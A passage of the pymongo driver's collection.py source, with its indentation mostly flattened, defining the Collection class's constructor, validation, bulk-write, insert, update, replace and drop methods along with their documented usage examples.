# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Collection level utilities for Mongo."""
import datetime
import warnings
from bson.code import Code
from bson.objectid import ObjectId
from bson.py3compat import (_unicode,
abc,
integer_types,
string_type)
from bson.raw_bson import RawBSONDocument
from bson.codec_options import CodecOptions
from bson.son import SON
from pymongo import (common,
helpers,
message)
from pymongo.aggregation import (_CollectionAggregationCommand,
_CollectionRawAggregationCommand)
from pymongo.bulk import BulkOperationBuilder, _Bulk
from pymongo.command_cursor import CommandCursor, RawBatchCommandCursor
from pymongo.common import ORDERED_TYPES
from pymongo.collation import validate_collation_or_none
from pymongo.change_stream import CollectionChangeStream
from pymongo.cursor import Cursor, RawBatchCursor
from pymongo.errors import (BulkWriteError,
ConfigurationError,
InvalidName,
InvalidOperation,
OperationFailure)
from pymongo.helpers import (_check_write_command_response,
_raise_last_error)
from pymongo.message import _UNICODE_REPLACE_CODEC_OPTIONS
from pymongo.operations import IndexModel
from pymongo.read_preferences import ReadPreference
from pymongo.results import (BulkWriteResult,
DeleteResult,
InsertOneResult,
InsertManyResult,
UpdateResult)
from pymongo.write_concern import WriteConcern
_UJOIN = u"%s.%s"
_FIND_AND_MODIFY_DOC_FIELDS = {'value': 1}
class ReturnDocument(object):
"""An enum used with
:meth:`~pymongo.collection.Collection.find_one_and_replace` and
:meth:`~pymongo.collection.Collection.find_one_and_update`.
"""
BEFORE = False
"""Return the original document before it was updated/replaced, or
``None`` if no document matches the query.
"""
AFTER = True
"""Return the updated/replaced or inserted document."""
class Collection(common.BaseObject):
"""A Mongo collection.
"""
def __init__(self, database, name, create=False, codec_options=None,
read_preference=None, write_concern=None, read_concern=None,
session=None, **kwargs):
"""Get / create a Mongo collection.
Raises :class:`TypeError` if `name` is not an instance of
:class:`basestring` (:class:`str` in python 3). Raises
:class:`~pymongo.errors.InvalidName` if `name` is not a valid
collection name. Any additional keyword arguments will be used
as options passed to the create command. See
:meth:`~pymongo.database.Database.create_collection` for valid
options.
If `create` is ``True``, `collation` is specified, or any additional
keyword arguments are present, a ``create`` command will be
sent, using ``session`` if specified. Otherwise, a ``create`` command
will not be sent and the collection will be created implicitly on first
use. The optional ``session`` argument is *only* used for the ``create``
        command; it is not associated with the collection afterward.
:Parameters:
- `database`: the database to get a collection from
- `name`: the name of the collection to get
- `create` (optional): if ``True``, force collection
creation even without options being set
- `codec_options` (optional): An instance of
:class:`~bson.codec_options.CodecOptions`. If ``None`` (the
default) database.codec_options is used.
- `read_preference` (optional): The read preference to use. If
``None`` (the default) database.read_preference is used.
- `write_concern` (optional): An instance of
:class:`~pymongo.write_concern.WriteConcern`. If ``None`` (the
default) database.write_concern is used.
- `read_concern` (optional): An instance of
:class:`~pymongo.read_concern.ReadConcern`. If ``None`` (the
default) database.read_concern is used.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. If a collation is provided,
it will be passed to the create collection command. This option is
only supported on MongoDB 3.4 and above.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession` that is used with
the create collection command
- `**kwargs` (optional): additional keyword arguments will
be passed as options for the create collection command
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Support the `collation` option.
.. versionchanged:: 3.2
Added the read_concern option.
.. versionchanged:: 3.0
Added the codec_options, read_preference, and write_concern options.
Removed the uuid_subtype attribute.
:class:`~pymongo.collection.Collection` no longer returns an
instance of :class:`~pymongo.collection.Collection` for attribute
names with leading underscores. You must use dict-style lookups
instead::
collection['__my_collection__']
Not:
collection.__my_collection__
.. versionchanged:: 2.2
Removed deprecated argument: options
.. versionadded:: 2.1
uuid_subtype attribute
.. mongodoc:: collections
"""
super(Collection, self).__init__(
codec_options or database.codec_options,
read_preference or database.read_preference,
write_concern or database.write_concern,
read_concern or database.read_concern)
if not isinstance(name, string_type):
raise TypeError("name must be an instance "
"of %s" % (string_type.__name__,))
if not name or ".." in name:
raise InvalidName("collection names cannot be empty")
if "$" in name and not (name.startswith("oplog.$main") or
name.startswith("$cmd")):
raise InvalidName("collection names must not "
"contain '$': %r" % name)
if name[0] == "." or name[-1] == ".":
raise InvalidName("collection names must not start "
"or end with '.': %r" % name)
if "\x00" in name:
raise InvalidName("collection names must not contain the "
"null character")
collation = validate_collation_or_none(kwargs.pop('collation', None))
self.__database = database
self.__name = _unicode(name)
self.__full_name = _UJOIN % (self.__database.name, self.__name)
if create or kwargs or collation:
self.__create(kwargs, collation, session)
self.__write_response_codec_options = self.codec_options._replace(
unicode_decode_error_handler='replace',
document_class=dict)
def _socket_for_reads(self, session):
return self.__database.client._socket_for_reads(
self._read_preference_for(session), session)
def _socket_for_writes(self, session):
return self.__database.client._socket_for_writes(session)
def _command(self, sock_info, command, slave_ok=False,
read_preference=None,
codec_options=None, check=True, allowable_errors=None,
read_concern=None,
write_concern=None,
collation=None,
session=None,
retryable_write=False,
user_fields=None):
"""Internal command helper.
:Parameters:
- `sock_info` - A SocketInfo instance.
- `command` - The command itself, as a SON instance.
- `slave_ok`: whether to set the SlaveOkay wire protocol bit.
- `codec_options` (optional) - An instance of
:class:`~bson.codec_options.CodecOptions`.
- `check`: raise OperationFailure if there are errors
- `allowable_errors`: errors to ignore if `check` is True
- `read_concern` (optional) - An instance of
:class:`~pymongo.read_concern.ReadConcern`.
- `write_concern`: An instance of
:class:`~pymongo.write_concern.WriteConcern`. This option is only
valid for MongoDB 3.4 and above.
- `collation` (optional) - An instance of
:class:`~pymongo.collation.Collation`.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `retryable_write` (optional): True if this command is a retryable
write.
- `user_fields` (optional): Response fields that should be decoded
using the TypeDecoders from codec_options, passed to
bson._decode_all_selective.
:Returns:
The result document.
"""
with self.__database.client._tmp_session(session) as s:
return sock_info.command(
self.__database.name,
command,
slave_ok,
read_preference or self._read_preference_for(session),
codec_options or self.codec_options,
check,
allowable_errors,
read_concern=read_concern,
write_concern=write_concern,
parse_write_concern_error=True,
collation=collation,
session=s,
client=self.__database.client,
retryable_write=retryable_write,
user_fields=user_fields)
def __create(self, options, collation, session):
"""Sends a create command with the given options.
"""
cmd = SON([("create", self.__name)])
if options:
if "size" in options:
options["size"] = float(options["size"])
cmd.update(options)
with self._socket_for_writes(session) as sock_info:
self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY,
write_concern=self._write_concern_for(session),
collation=collation, session=session)
def __getattr__(self, name):
"""Get a sub-collection of this collection by name.
Raises InvalidName if an invalid collection name is used.
:Parameters:
- `name`: the name of the collection to get
"""
if name.startswith('_'):
full_name = _UJOIN % (self.__name, name)
raise AttributeError(
"Collection has no attribute %r. To access the %s"
" collection, use database['%s']." % (
name, full_name, full_name))
return self.__getitem__(name)
def __getitem__(self, name):
return Collection(self.__database,
_UJOIN % (self.__name, name),
False,
self.codec_options,
self.read_preference,
self.write_concern,
self.read_concern)
def __repr__(self):
return "Collection(%r, %r)" % (self.__database, self.__name)
def __eq__(self, other):
if isinstance(other, Collection):
return (self.__database == other.database and
self.__name == other.name)
return NotImplemented
def __ne__(self, other):
return not self == other
@property
def full_name(self):
"""The full name of this :class:`Collection`.
The full name is of the form `database_name.collection_name`.
"""
return self.__full_name
@property
def name(self):
"""The name of this :class:`Collection`."""
return self.__name
@property
def database(self):
"""The :class:`~pymongo.database.Database` that this
:class:`Collection` is a part of.
"""
return self.__database
def with_options(self, codec_options=None, read_preference=None,
write_concern=None, read_concern=None):
"""Get a clone of this collection changing the specified settings.
>>> coll1.read_preference
Primary()
>>> from pymongo import ReadPreference
>>> coll2 = coll1.with_options(read_preference=ReadPreference.SECONDARY)
>>> coll1.read_preference
Primary()
>>> coll2.read_preference
Secondary(tag_sets=None)
:Parameters:
- `codec_options` (optional): An instance of
:class:`~bson.codec_options.CodecOptions`. If ``None`` (the
default) the :attr:`codec_options` of this :class:`Collection`
is used.
- `read_preference` (optional): The read preference to use. If
``None`` (the default) the :attr:`read_preference` of this
:class:`Collection` is used. See :mod:`~pymongo.read_preferences`
for options.
- `write_concern` (optional): An instance of
:class:`~pymongo.write_concern.WriteConcern`. If ``None`` (the
default) the :attr:`write_concern` of this :class:`Collection`
is used.
- `read_concern` (optional): An instance of
:class:`~pymongo.read_concern.ReadConcern`. If ``None`` (the
default) the :attr:`read_concern` of this :class:`Collection`
is used.
"""
return Collection(self.__database,
self.__name,
False,
codec_options or self.codec_options,
read_preference or self.read_preference,
write_concern or self.write_concern,
read_concern or self.read_concern)
def initialize_unordered_bulk_op(self, bypass_document_validation=False):
"""**DEPRECATED** - Initialize an unordered batch of write operations.
Operations will be performed on the server in arbitrary order,
possibly in parallel. All operations will be attempted.
:Parameters:
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
Returns a :class:`~pymongo.bulk.BulkOperationBuilder` instance.
See :ref:`unordered_bulk` for examples.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.5
Deprecated. Use :meth:`~pymongo.collection.Collection.bulk_write`
instead.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 2.7
"""
warnings.warn("initialize_unordered_bulk_op is deprecated",
DeprecationWarning, stacklevel=2)
return BulkOperationBuilder(self, False, bypass_document_validation)
def initialize_ordered_bulk_op(self, bypass_document_validation=False):
"""**DEPRECATED** - Initialize an ordered batch of write operations.
Operations will be performed on the server serially, in the
order provided. If an error occurs all remaining operations
are aborted.
:Parameters:
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
Returns a :class:`~pymongo.bulk.BulkOperationBuilder` instance.
See :ref:`ordered_bulk` for examples.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.5
Deprecated. Use :meth:`~pymongo.collection.Collection.bulk_write`
instead.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 2.7
"""
warnings.warn("initialize_ordered_bulk_op is deprecated",
DeprecationWarning, stacklevel=2)
return BulkOperationBuilder(self, True, bypass_document_validation)
def bulk_write(self, requests, ordered=True,
bypass_document_validation=False, session=None):
"""Send a batch of write operations to the server.
Requests are passed as a list of write operation instances (
:class:`~pymongo.operations.InsertOne`,
:class:`~pymongo.operations.UpdateOne`,
:class:`~pymongo.operations.UpdateMany`,
:class:`~pymongo.operations.ReplaceOne`,
:class:`~pymongo.operations.DeleteOne`, or
:class:`~pymongo.operations.DeleteMany`).
>>> for doc in db.test.find({}):
... print(doc)
...
{u'x': 1, u'_id': ObjectId('54f62e60fba5226811f634ef')}
{u'x': 1, u'_id': ObjectId('54f62e60fba5226811f634f0')}
>>> # DeleteMany, UpdateOne, and UpdateMany are also available.
...
>>> from pymongo import InsertOne, DeleteOne, ReplaceOne
>>> requests = [InsertOne({'y': 1}), DeleteOne({'x': 1}),
... ReplaceOne({'w': 1}, {'z': 1}, upsert=True)]
>>> result = db.test.bulk_write(requests)
>>> result.inserted_count
1
>>> result.deleted_count
1
>>> result.modified_count
0
>>> result.upserted_ids
{2: ObjectId('54f62ee28891e756a6e1abd5')}
>>> for doc in db.test.find({}):
... print(doc)
...
{u'x': 1, u'_id': ObjectId('54f62e60fba5226811f634f0')}
{u'y': 1, u'_id': ObjectId('54f62ee2fba5226811f634f1')}
{u'z': 1, u'_id': ObjectId('54f62ee28891e756a6e1abd5')}
:Parameters:
- `requests`: A list of write operations (see examples above).
- `ordered` (optional): If ``True`` (the default) requests will be
performed on the server serially, in the order provided. If an error
occurs all remaining operations are aborted. If ``False`` requests
will be performed on the server in arbitrary order, possibly in
parallel, and all operations will be attempted.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
An instance of :class:`~pymongo.results.BulkWriteResult`.
.. seealso:: :ref:`writes-and-ids`
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
common.validate_list("requests", requests)
blk = _Bulk(self, ordered, bypass_document_validation)
for request in requests:
try:
request._add_to_bulk(blk)
except AttributeError:
raise TypeError("%r is not a valid request" % (request,))
write_concern = self._write_concern_for(session)
bulk_api_result = blk.execute(write_concern, session)
if bulk_api_result is not None:
return BulkWriteResult(bulk_api_result, True)
return BulkWriteResult({}, False)
def _legacy_write(self, sock_info, name, cmd, op_id,
bypass_doc_val, func, *args):
"""Internal legacy unacknowledged write helper."""
# Cannot have both unacknowledged write and bypass document validation.
if bypass_doc_val and sock_info.max_wire_version >= 4:
raise OperationFailure("Cannot set bypass_document_validation with"
" unacknowledged write concern")
listeners = self.database.client._event_listeners
publish = listeners.enabled_for_commands
if publish:
start = datetime.datetime.now()
args = args + (sock_info.compression_context,)
rqst_id, msg, max_size = func(*args)
if publish:
duration = datetime.datetime.now() - start
listeners.publish_command_start(
cmd, self.__database.name, rqst_id, sock_info.address, op_id)
start = datetime.datetime.now()
try:
result = sock_info.legacy_write(rqst_id, msg, max_size, False)
except Exception as exc:
if publish:
dur = (datetime.datetime.now() - start) + duration
if isinstance(exc, OperationFailure):
details = exc.details
# Succeed if GLE was successful and this is a write error.
if details.get("ok") and "n" in details:
reply = message._convert_write_result(
name, cmd, details)
listeners.publish_command_success(
dur, reply, name, rqst_id, sock_info.address, op_id)
raise
else:
details = message._convert_exception(exc)
listeners.publish_command_failure(
dur, details, name, rqst_id, sock_info.address, op_id)
raise
if publish:
if result is not None:
reply = message._convert_write_result(name, cmd, result)
else:
# Comply with APM spec.
reply = {'ok': 1}
duration = (datetime.datetime.now() - start) + duration
listeners.publish_command_success(
duration, reply, name, rqst_id, sock_info.address, op_id)
return result
def _insert_one(
self, doc, ordered,
check_keys, manipulate, write_concern, op_id, bypass_doc_val,
session):
"""Internal helper for inserting a single document."""
if manipulate:
doc = self.__database._apply_incoming_manipulators(doc, self)
if not isinstance(doc, RawBSONDocument) and '_id' not in doc:
doc['_id'] = ObjectId()
doc = self.__database._apply_incoming_copying_manipulators(doc,
self)
write_concern = write_concern or self.write_concern
acknowledged = write_concern.acknowledged
command = SON([('insert', self.name),
('ordered', ordered),
('documents', [doc])])
if not write_concern.is_server_default:
command['writeConcern'] = write_concern.document
def _insert_command(session, sock_info, retryable_write):
if not sock_info.op_msg_enabled and not acknowledged:
# Legacy OP_INSERT.
return self._legacy_write(
sock_info, 'insert', command, op_id,
bypass_doc_val, message.insert, self.__full_name,
[doc], check_keys, False, write_concern.document, False,
self.__write_response_codec_options)
if bypass_doc_val and sock_info.max_wire_version >= 4:
command['bypassDocumentValidation'] = True
result = sock_info.command(
self.__database.name,
command,
write_concern=write_concern,
codec_options=self.__write_response_codec_options,
check_keys=check_keys,
session=session,
client=self.__database.client,
retryable_write=retryable_write)
_check_write_command_response(result)
self.__database.client._retryable_write(
acknowledged, _insert_command, session)
if not isinstance(doc, RawBSONDocument):
return doc.get('_id')
def _insert(self, docs, ordered=True, check_keys=True,
manipulate=False, write_concern=None, op_id=None,
bypass_doc_val=False, session=None):
"""Internal insert helper."""
if isinstance(docs, abc.Mapping):
return self._insert_one(
docs, ordered, check_keys, manipulate, write_concern, op_id,
bypass_doc_val, session)
ids = []
if manipulate:
def gen():
"""Generator that applies SON manipulators to each document
and adds _id if necessary.
"""
_db = self.__database
for doc in docs:
# Apply user-configured SON manipulators. This order of
# operations is required for backwards compatibility,
# see PYTHON-709.
doc = _db._apply_incoming_manipulators(doc, self)
if not (isinstance(doc, RawBSONDocument) or '_id' in doc):
doc['_id'] = ObjectId()
doc = _db._apply_incoming_copying_manipulators(doc, self)
ids.append(doc['_id'])
yield doc
else:
def gen():
"""Generator that only tracks existing _ids."""
for doc in docs:
# Don't inflate RawBSONDocument by touching fields.
if not isinstance(doc, RawBSONDocument):
ids.append(doc.get('_id'))
yield doc
write_concern = write_concern or self._write_concern_for(session)
blk = _Bulk(self, ordered, bypass_doc_val)
blk.ops = [(message._INSERT, doc) for doc in gen()]
try:
blk.execute(write_concern, session=session)
except BulkWriteError as bwe:
_raise_last_error(bwe.details)
return ids
def insert_one(self, document, bypass_document_validation=False,
session=None):
"""Insert a single document.
>>> db.test.count_documents({'x': 1})
0
>>> result = db.test.insert_one({'x': 1})
>>> result.inserted_id
ObjectId('54f112defba522406c9cc208')
>>> db.test.find_one({'x': 1})
{u'x': 1, u'_id': ObjectId('54f112defba522406c9cc208')}
:Parameters:
- `document`: The document to insert. Must be a mutable mapping
type. If the document does not have an _id field one will be
added automatically.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.InsertOneResult`.
.. seealso:: :ref:`writes-and-ids`
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
common.validate_is_document_type("document", document)
if not (isinstance(document, RawBSONDocument) or "_id" in document):
document["_id"] = ObjectId()
write_concern = self._write_concern_for(session)
return InsertOneResult(
self._insert(document,
write_concern=write_concern,
bypass_doc_val=bypass_document_validation,
session=session),
write_concern.acknowledged)
def insert_many(self, documents, ordered=True,
bypass_document_validation=False, session=None):
"""Insert an iterable of documents.
>>> db.test.count_documents({})
0
>>> result = db.test.insert_many([{'x': i} for i in range(2)])
>>> result.inserted_ids
[ObjectId('54f113fffba522406c9cc20e'), ObjectId('54f113fffba522406c9cc20f')]
>>> db.test.count_documents({})
2
:Parameters:
          - `documents`: An iterable of documents to insert.
- `ordered` (optional): If ``True`` (the default) documents will be
inserted on the server serially, in the order provided. If an error
occurs all remaining inserts are aborted. If ``False``, documents
will be inserted on the server in arbitrary order, possibly in
parallel, and all document inserts will be attempted.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
An instance of :class:`~pymongo.results.InsertManyResult`.
.. seealso:: :ref:`writes-and-ids`
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
if not isinstance(documents, abc.Iterable) or not documents:
raise TypeError("documents must be a non-empty list")
inserted_ids = []
def gen():
"""A generator that validates documents and handles _ids."""
for document in documents:
common.validate_is_document_type("document", document)
if not isinstance(document, RawBSONDocument):
if "_id" not in document:
document["_id"] = ObjectId()
inserted_ids.append(document["_id"])
yield (message._INSERT, document)
write_concern = self._write_concern_for(session)
blk = _Bulk(self, ordered, bypass_document_validation)
blk.ops = [doc for doc in gen()]
blk.execute(write_concern, session=session)
return InsertManyResult(inserted_ids, write_concern.acknowledged)
def _update(self, sock_info, criteria, document, upsert=False,
check_keys=True, multi=False, manipulate=False,
write_concern=None, op_id=None, ordered=True,
bypass_doc_val=False, collation=None, array_filters=None,
session=None, retryable_write=False):
"""Internal update / replace helper."""
common.validate_boolean("upsert", upsert)
if manipulate:
document = self.__database._fix_incoming(document, self)
collation = validate_collation_or_none(collation)
write_concern = write_concern or self.write_concern
acknowledged = write_concern.acknowledged
update_doc = SON([('q', criteria),
('u', document),
('multi', multi),
('upsert', upsert)])
if collation is not None:
if sock_info.max_wire_version < 5:
raise ConfigurationError(
'Must be connected to MongoDB 3.4+ to use collations.')
elif not acknowledged:
raise ConfigurationError(
'Collation is unsupported for unacknowledged writes.')
else:
update_doc['collation'] = collation
if array_filters is not None:
if sock_info.max_wire_version < 6:
raise ConfigurationError(
'Must be connected to MongoDB 3.6+ to use array_filters.')
elif not acknowledged:
raise ConfigurationError(
'arrayFilters is unsupported for unacknowledged writes.')
else:
update_doc['arrayFilters'] = array_filters
command = SON([('update', self.name),
('ordered', ordered),
('updates', [update_doc])])
if not write_concern.is_server_default:
command['writeConcern'] = write_concern.document
if not sock_info.op_msg_enabled and not acknowledged:
# Legacy OP_UPDATE.
return self._legacy_write(
sock_info, 'update', command, op_id,
bypass_doc_val, message.update, self.__full_name, upsert,
multi, criteria, document, False, write_concern.document,
check_keys, self.__write_response_codec_options)
# Update command.
if bypass_doc_val and sock_info.max_wire_version >= 4:
command['bypassDocumentValidation'] = True
# The command result has to be published for APM unmodified
# so we make a shallow copy here before adding updatedExisting.
result = sock_info.command(
self.__database.name,
command,
write_concern=write_concern,
codec_options=self.__write_response_codec_options,
session=session,
client=self.__database.client,
retryable_write=retryable_write).copy()
_check_write_command_response(result)
# Add the updatedExisting field for compatibility.
if result.get('n') and 'upserted' not in result:
result['updatedExisting'] = True
else:
result['updatedExisting'] = False
# MongoDB >= 2.6.0 returns the upsert _id in an array
# element. Break it out for backward compatibility.
if 'upserted' in result:
result['upserted'] = result['upserted'][0]['_id']
if not acknowledged:
return None
return result
def _update_retryable(
self, criteria, document, upsert=False,
check_keys=True, multi=False, manipulate=False,
write_concern=None, op_id=None, ordered=True,
bypass_doc_val=False, collation=None, array_filters=None,
session=None):
"""Internal update / replace helper."""
def _update(session, sock_info, retryable_write):
return self._update(
sock_info, criteria, document, upsert=upsert,
check_keys=check_keys, multi=multi, manipulate=manipulate,
write_concern=write_concern, op_id=op_id, ordered=ordered,
bypass_doc_val=bypass_doc_val, collation=collation,
array_filters=array_filters, session=session,
retryable_write=retryable_write)
return self.__database.client._retryable_write(
(write_concern or self.write_concern).acknowledged and not multi,
_update, session)
def replace_one(self, filter, replacement, upsert=False,
bypass_document_validation=False, collation=None,
session=None):
"""Replace a single document matching the filter.
>>> for doc in db.test.find({}):
... print(doc)
...
{u'x': 1, u'_id': ObjectId('54f4c5befba5220aa4d6dee7')}
>>> result = db.test.replace_one({'x': 1}, {'y': 1})
>>> result.matched_count
1
>>> result.modified_count
1
>>> for doc in db.test.find({}):
... print(doc)
...
{u'y': 1, u'_id': ObjectId('54f4c5befba5220aa4d6dee7')}
The *upsert* option can be used to insert a new document if a matching
document does not exist.
>>> result = db.test.replace_one({'x': 1}, {'x': 1}, True)
>>> result.matched_count
0
>>> result.modified_count
0
>>> result.upserted_id
ObjectId('54f11e5c8891e756a6e1abd4')
>>> db.test.find_one({'x': 1})
{u'x': 1, u'_id': ObjectId('54f11e5c8891e756a6e1abd4')}
:Parameters:
- `filter`: A query that matches the document to replace.
- `replacement`: The new document.
- `upsert` (optional): If ``True``, perform an insert if no documents
match the filter.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.UpdateResult`.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
common.validate_is_mapping("filter", filter)
common.validate_ok_for_replace(replacement)
write_concern = self._write_concern_for(session)
return UpdateResult(
self._update_retryable(
filter, replacement, upsert,
write_concern=write_concern,
bypass_doc_val=bypass_document_validation,
collation=collation, session=session),
write_concern.acknowledged)
def update_one(self, filter, update, upsert=False,
bypass_document_validation=False,
collation=None, array_filters=None, session=None):
"""Update a single document matching the filter.
>>> for doc in db.test.find():
... print(doc)
...
{u'x': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
>>> result = db.test.update_one({'x': 1}, {'$inc': {'x': 3}})
>>> result.matched_count
1
>>> result.modified_count
1
>>> for doc in db.test.find():
... print(doc)
...
{u'x': 4, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
:Parameters:
- `filter`: A query that matches the document to update.
- `update`: The modifications to apply.
- `upsert` (optional): If ``True``, perform an insert if no documents
match the filter.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `array_filters` (optional): A list of filters specifying which
array elements an update should apply to. Requires MongoDB 3.6+.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.UpdateResult`.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.9
Added the ability to accept a pipeline as the `update`.
.. versionchanged:: 3.6
Added the `array_filters` and ``session`` parameters.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
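An illustrative sketch combining ``upsert`` and ``array_filters`` (the
names are made up for the example; the ``array_filters`` call assumes a
MongoDB 3.6+ server)::
    from pymongo import MongoClient
    scores = MongoClient().example_db.scores  # illustrative collection
    # Upsert: create the document if no document matches the filter.
    scores.update_one({'name': 'alice'},
                      {'$setOnInsert': {'grades': [90, 80, 70]}},
                      upsert=True)
    # Update only the array elements matched by the 'g' filter.
    scores.update_one({'name': 'alice'},
                      {'$set': {'grades.$[g]': 100}},
                      array_filters=[{'g': {'$gte': 85}}])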
"""
common.validate_is_mapping("filter", filter)
common.validate_ok_for_update(update)
common.validate_list_or_none('array_filters', array_filters)
write_concern = self._write_concern_for(session)
return UpdateResult(
self._update_retryable(
filter, update, upsert, check_keys=False,
write_concern=write_concern,
bypass_doc_val=bypass_document_validation,
collation=collation, array_filters=array_filters,
session=session),
write_concern.acknowledged)
def update_many(self, filter, update, upsert=False, array_filters=None,
bypass_document_validation=False, collation=None,
session=None):
"""Update one or more documents that match the filter.
>>> for doc in db.test.find():
... print(doc)
...
{u'x': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
>>> result = db.test.update_many({'x': 1}, {'$inc': {'x': 3}})
>>> result.matched_count
3
>>> result.modified_count
3
>>> for doc in db.test.find():
... print(doc)
...
{u'x': 4, u'_id': 0}
{u'x': 4, u'_id': 1}
{u'x': 4, u'_id': 2}
:Parameters:
- `filter`: A query that matches the documents to update.
- `update`: The modifications to apply.
- `upsert` (optional): If ``True``, perform an insert if no documents
match the filter.
- `bypass_document_validation` (optional): If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `array_filters` (optional): A list of filters specifying which
array elements an update should apply to. Requires MongoDB 3.6+.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.UpdateResult`.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.9
Added the ability to accept a pipeline as the `update`.
.. versionchanged:: 3.6
Added ``array_filters`` and ``session`` parameters.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
common.validate_is_mapping("filter", filter)
common.validate_ok_for_update(update)
common.validate_list_or_none('array_filters', array_filters)
write_concern = self._write_concern_for(session)
return UpdateResult(
self._update_retryable(
filter, update, upsert, check_keys=False, multi=True,
write_concern=write_concern,
bypass_doc_val=bypass_document_validation,
collation=collation, array_filters=array_filters,
session=session),
write_concern.acknowledged)
def drop(self, session=None):
"""Alias for :meth:`~pymongo.database.Database.drop_collection`.
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
The following two calls are equivalent:
>>> db.foo.drop()
>>> db.drop_collection("foo")
.. versionchanged:: 3.7
:meth:`drop` now respects this :class:`Collection`'s :attr:`write_concern`.
.. versionchanged:: 3.6
Added ``session`` parameter.
"""
dbo = self.__database.client.get_database(
self.__database.name,
self.codec_options,
self.read_preference,
self.write_concern,
self.read_concern)
dbo.drop_collection(self.__name, session=session)
def _delete(
self, sock_info, criteria, multi,
write_concern=None, op_id=None, ordered=True,
collation=None, session=None, retryable_write=False):
"""Internal delete helper."""
common.validate_is_mapping("filter", criteria)
write_concern = write_concern or self.write_concern
acknowledged = write_concern.acknowledged
delete_doc = SON([('q', criteria),
('limit', int(not multi))])
collation = validate_collation_or_none(collation)
if collation is not None:
if sock_info.max_wire_version < 5:
raise ConfigurationError(
'Must be connected to MongoDB 3.4+ to use collations.')
elif not acknowledged:
raise ConfigurationError(
'Collation is unsupported for unacknowledged writes.')
else:
delete_doc['collation'] = collation
command = SON([('delete', self.name),
('ordered', ordered),
('deletes', [delete_doc])])
if not write_concern.is_server_default:
command['writeConcern'] = write_concern.document
if not sock_info.op_msg_enabled and not acknowledged:
# Legacy OP_DELETE.
return self._legacy_write(
sock_info, 'delete', command, op_id,
False, message.delete, self.__full_name, criteria,
False, write_concern.document,
self.__write_response_codec_options,
int(not multi))
# Delete command.
result = sock_info.command(
self.__database.name,
command,
write_concern=write_concern,
codec_options=self.__write_response_codec_options,
session=session,
client=self.__database.client,
retryable_write=retryable_write)
_check_write_command_response(result)
return result
def _delete_retryable(
self, criteria, multi,
write_concern=None, op_id=None, ordered=True,
collation=None, session=None):
"""Internal delete helper."""
def _delete(session, sock_info, retryable_write):
return self._delete(
sock_info, criteria, multi,
write_concern=write_concern, op_id=op_id, ordered=ordered,
collation=collation, session=session,
retryable_write=retryable_write)
return self.__database.client._retryable_write(
(write_concern or self.write_concern).acknowledged and not multi,
_delete, session)
def delete_one(self, filter, collation=None, session=None):
"""Delete a single document matching the filter.
>>> db.test.count_documents({'x': 1})
3
